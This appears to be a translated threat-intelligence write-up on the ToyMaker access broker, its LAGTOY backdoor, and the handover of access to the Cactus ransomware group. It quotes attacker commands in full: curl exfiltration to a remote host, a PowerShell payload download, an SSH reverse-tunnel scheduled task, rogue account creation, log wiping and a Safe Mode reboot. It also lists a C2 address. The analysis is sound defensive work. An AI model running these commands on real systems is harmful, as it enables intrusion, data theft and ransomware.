08.01.2025
1 min
802
Modern cyberattacks are increasingly less likely to begin with encryption or public extortion. Far more often, the first stage unfolds quietly through the acquisition of initial access to corporate systems. It is at this level that specialized actors emerge: they do not attack businesses directly, but operate in the shadows, laying the groundwork for subsequent incidents. This article examines one such case, offering a clearer understanding of how the modern cyberattack chain is formed, from the compromise of external services to establishing a foothold within the infrastructure.
In 2023, a large-scale compromise of a critical infrastructure enterprise was uncovered, involving a combination of several threat actors. From initial access to double extortion, these participants gradually and methodically compromised a large number of hosts across the network, using a mix of dual-use remote administration tools, SSH, and file transfer utilities.
The initial access broker (Initial Access Broker, IAB), provisionally named ToyMaker and assessed with moderate confidence as a financially motivated threat actor, exploits vulnerable internet-facing systems. After gaining entry, it deploys its own backdoor called LAGTOY and steals credentials from the victim’s infrastructure. LAGTOY is used to establish reverse shell connections and execute commands on infected endpoints.
Compromise via LAGTOY can lead to the transfer of access to a secondary threat actor. In particular, it was observed that ToyMaker handed over access to the Cactus group, a double extortion group that applied its own tactics, techniques, and procedures (TTPs) for further malicious activity within the victim’s network.
Analysis of intrusions across multiple endpoints made it possible to reconstruct a timeline of events, from the initial compromise to the transfer of access and subsequent activity by the secondary actor. Below is a generalized timeline.
Type of activity:
user enumeration;
initial reconnaissance;
creation of a fake user account;
credential extraction using Magnet RAM Capture. Actor: ToyMaker
+2 days
Type of activity:
deployment of the LAGTOY implant. Actor: ToyMaker
Idle period of approximately 3 weeks
+3 weeks (Day 0 Cactus)
Type of activity:
endpoint inventory. Actor: Cactus
Day 2 Cactus
Type of activity:
server and file inventory;
removal of indicators of compromise. Actor: Cactus
Day 2–3 Cactus
Type of activity:
lateral movement across the corporate network. Actor: Cactus
Day 4 Cactus
Type of activity:
archiving sensitive data for exfiltration and extortion. Actor: Cactus
Day 8 Cactus
Type of activity:
deployment of remote management tools (eHorus, RMS, AnyDesk);
OpenSSH connections. Actor: Cactus
Day 12 Cactus
Type of activity:
creation of malicious accounts for ransomware deployment;
deletion of volume shadow copies;
modification of system recovery settings. Actor: Cactus
After the initial intrusion, ToyMaker spent approximately one week conducting initial reconnaissance, extracting credentials, and deploying a backdoor, after which activity ceased. No targeted data exfiltration or attempts at deeper movement toward higher-value assets were observed.
Following a quiet period of around three weeks, the Cactus group appeared in the network, using credentials stolen by ToyMaker. Given the short dwell time, the absence of data theft, and the subsequent transfer of access, it is unlikely that ToyMaker pursued espionage objectives.
As a result, ToyMaker is assessed with moderate confidence as a financially motivated initial access broker that gains access to high-value organizations and transfers it to secondary actors who monetize that access through ransomware and double extortion.
System reconnaissance
Purpose: discovering information about the system
Purpose: collecting network information
Purpose: account creation
The attacker launches an SSH listener using Windows OpenSSH (sshd.exe). After that, another compromised system creates the file sftp-server.exe, which is used to download the Magnet RAM Capture executable.
Purpose: extracting credentials from memory
The resulting memory dump is archived:
After that, the archive is exfiltrated using SCP:
After obtaining memory dumps via an sftp connection, a custom reverse shell implant named LAGTOY is downloaded and executed.
To establish persistence on the system, a service is created:
The implant connects to a hardcoded C2 server and executes the received commands, including:
LAGTOY is a simple but effective backdoor. It periodically communicates with its C2 server, executes commands on the infected system, operates as a service, and includes basic anti-debugging mechanisms before establishing a connection.
As an anti-debugging technique, the malware registers its own unhandled exception handler using the kernel32!SetUnhandledExceptionFilter() function. If the sample is executed under a debugger, this user-defined handler will not be invoked and the exception will be passed directly to the debugger. Accordingly, if the unhandled exception handler is successfully registered and execution is transferred to it, this indicates that the process is not running under a debugger.
LAGTOY is designed to operate on the infected system as a service named “WmiPrvSV.”
The IP address of the command-and-control (C2) server and the port number are hardcoded directly into LAGTOY. Communication takes place over port 443 using a raw socket, without the use of TLS, which would normally be expected for this TCP port.
The C2 server sends LAGTOY special administrative codes:
#pt – stop the service.
#pd – interrupt the current execution chain and check whether the service is stopped. If the service is stopped, switch to Sleep mode for a specified period of time and then reinitiate the connection to the C2 server.
#ps – simply create the specified process or execute the given command.
If the code does not start with the # character, LAGTOY simply executes the received command or process name on the endpoint.
Compared to the sample identified by Mandiant in 2022, this variant added the #ps handler, which is intended to create a process from the supplied command.
#ps.LAGTOY uses its own timing logic to determine whether commands should be executed or whether it should enter Sleep mode for a defined period. With high confidence, this logic is considered a unique custom implementation specific to the LAGTOY implant family.
LAGTOY is capable of processing three commands from the C2 server, with a Sleep interval of 11,000 milliseconds between them. During the beaconing cycle, it records the time of the last successful connection to the C2 server and the last successful command execution. If commands received from the C2 server are not successfully executed for at least 30 minutes, the implant sends an error status message to the C2 server indicating command execution failure.
LAGTOY includes a built-in watchdog mechanism. If the implant runs for a cumulative period exceeding 60 minutes, it stops executing commands and checks whether the service has been stopped. If the service remains active, the implant reinitiates a connection to the C2 server.
Almost a month after ToyMaker established access to the victim organization’s infrastructure, the actor transferred this access to a secondary threat actor affiliated with the Cactus ransomware group, which primarily conducts ransomware and double extortion attacks.
The Cactus group carried out its own reconnaissance and persistence activities, deploying its own malware toolset instead of using LAGTOY as a mechanism for further penetration into the corporate network. Initial access to the compromised endpoint was obtained using user credentials previously stolen by ToyMaker with the Magnet RAM Capture tool.
Cactus immediately began network scanning to identify valuable systems and enable further lateral movement. To do so, an initial WSMAN discovery script was executed, allowing the attackers to enumerate all endpoints configured to handle PowerShell remoting.
Command:
Purpose: Remote System Discovery [T1018]
Follow-up included archiving and transferring results:
C:\PerfLogs\Admin\7z.exe a -p<password> pss.7z .\result.csv C:\PerfLogs\Admin\curl.exe -k -T .\pss.7z hxxps://<remote_ip>:8443 C:\PerfLogs\Admin\7z.exe a -p<pwd> .\CP-SERVER3.7z .\CP-SERVER3.txt C:\PerfLogs\Admin\7z.exe a -p<pwd> .\FILEN01.7z .\FILEN01.txt C:\PerfLogs\Admin\curl.exe -k -T .\CP-SERVER3.7z hxxps://<remote_ip>:8443 C:\PerfLogs\Admin\curl.exe -k -T .\FILEN01.7z hxxps://<remote_ip>:8443 C:\PerfLogs\Admin\7z.exe a -p<pwd> .\FILE-SERVER.7z .\FILE-SERVER.txt C:\PerfLogs\Admin\curl.exe -k -T .\FILE-SERVER.7z hxxps://<remote_ip>:8443
The collected results were compressed and transferred to a remote server. Similar actions were performed for other gathered information. Data exfiltration [T1048]
Commands and purpose:
C:\Windows\system32\reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
Purpose: remove indicators, clear command history [T1070]
C:\Windows\system32\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default /va /f C:\Windows\system32\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers /f C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers C:\Windows\system32\attrib.exe %userprofile%\documents\Default.rdp -s -h
Purpose: remove indicators, clear history of network connections and configurations [T1070]
net user support /delete
Purpose: removing indicators, cleaning fastening mechanisms [T1070]
The obtained credentials gave ToyMaker access to a large number of systems, where the actor conducted reconnaissance to locate valuable information. Identified files were either archived and exfiltrated using dual-use tools such as 7zip and curl, or transferred directly via file transfer utilities, including WinSCP [T1560, T1048].
Examples of archiving and exfiltration preparation commands:
C:\PerfLogs\Admin\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso -xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -xr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar -xr!test\ -xr!tests\ -xr!jdk8\ e:\tmp\<filename>
C:\PerfLogs\Admin\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test\ -xr!tests\ -xr!jdk8\ e:\tmp\<filename>
On other endpoints, the attackers detected and archived, presumably, the victim’s client data for further exfiltration [T1560, T1048]:
C:\Windows\system32\cmd.exe /c <path>\7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>\0001.7z <path>\Private Folder\Customers\<path> -p<password>
Cactus used a variety of remote administration tools across different endpoints to maintain long-term access. The tools observed included:
eHorus Agent: remote management software, also known as Pandora RC
AnyDesk: a remote desktop application
Remote Utilities for Windows Admin (RMS Remote Admin): a Russian-origin remote administration platform
OpenSSH: an SSH package included with Windows and available for installation on the operating system
Remote administration utilities were downloaded from attacker-controlled remote resources using PowerShell and Impacket.
Teams and assignments:
cmd.exe /Q /c powershell iwr -Uri http://<remote_IP>:7423/file.msi -OutFile C:\Programdata\f.msi 1> \\127.0.0.1\ADMIN$\__<random> 2>&1
Purpose: preparing capabilities, downloading malware [T1608]
cmd.exe /Q /c msiexec.exe /i C:\Programdata\f.msi /q EHUSER=<username> STARTEHORUSSERVICE=1 DESKTOPSHORTCUT=0 1> \\127.0.0.1\ADMIN$\__<random> 2>&1
Purpose: execution via system binary, Msiexec [T1218]
In other cases, the attackers established reverse shell connections using OpenSSH. To achieve this, a scheduled task was created that connected to the C2 server on an hourly basis to receive and execute commands.
Commands and purpose:
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:\Windows\temp\sys_log.bat > c:\Windows\temp\log.txt
Purpose: planned task or work [T1053]
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe -o "StrictHostKeyChecking no" root@<remote_ip> -p 443 -R 25369 -NCqf -i "C:\Windows\temp\syslog.txt" & timeout /t 15)
Purpose: Scheduled task or job [T1053] Remote services, SSH [T1021]
The Cactus group places strong emphasis on operational security. They restrict access to the file containing the private SSH key used for data exfiltration, preventing the victim from reading the key under normal conditions.
Commands and purpose:
icacls C:\Windows\Temp\syslog.txt icacls.exe C:\Windows\temp\syslog.txt /c /t /inheritance:d icacls.exe C:\Windows\Temp\syslog.txt /c /t /remove BUILTIN\Administrators icacls.exe C:\Windows\Temp\syslog.txt /c /t /remove <userid> icacls.exe C:\Windows\temp\syslog.txt /inheritance:r /grant SYSTEM:F
Purpose: changing file and directory permissions in Windows [T1222]
The file syslog.txt is a private key that the threat actor uses to initiate SSH connections to attacker-controlled infrastructure.
On some endpoints, the malicious operators created new unauthorized user accounts, likely to facilitate ransomware deployment:
net user whiteninja <password> /add
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /t REG_SZ /d /f
reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v DefaultUserName /t REG_SZ /d whiteninja /f
reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v AutoLogonCount /t REG_DWORD /d 1 /f
During the investigation, it was discovered that the threat actor executed commands to reboot compromised hosts into Safe Mode:
bcdedit /set {default} safeboot minimal
shutdown -r -f -t 0
Booting the system into Safe Mode can be used to disable security controls, as only a minimal set of drivers and services is loaded in this mode. Some security products may be inactive or operate with limited functionality in Safe Mode, allowing the attacker to modify registry keys or settings to fully disable protection T1562.001T1562.001.
Cactus also actively used Windows binaries PuTTY and ApacheBench with injected Metasploit shellcode. ApacheBench is a tool for benchmarking Apache HTTP servers and, in this case, was leveraged for code execution on compromised systems.
These binaries established connections to the same remote server used to host the portable eHorus agent, specifically 51[.]81[.]42[.]234, over ports 53, 443, 8343, and 9232. In addition, Cactus deployed Metasploit-generated ELF binaries that also communicated with the same C2 server, 51[.]81[.]42[.]234.
Metasploit shellcode communicating with a remote server.
This case clearly demonstrates that a modern cyberattack begins long before ransomware appears. A key role is played by initial access brokers, who quietly infiltrate the network, establish persistence, harvest credentials, and prepare the infrastructure for subsequent attack stages. Access is then handed over to specialized groups that scale the compromise, exfiltrate data, and carry out double extortion.
The clear separation of roles between ToyMaker and Cactus illustrates a mature, market-driven cybercrime model, where an attack is the result of a chain of interconnected actions rather than a single intrusion. From a defensive perspective, this leads to one critical conclusion: it is essential to detect threats at the initial access stage, before they escalate into a full-scale incident with serious consequences for business operations and infrastructure.
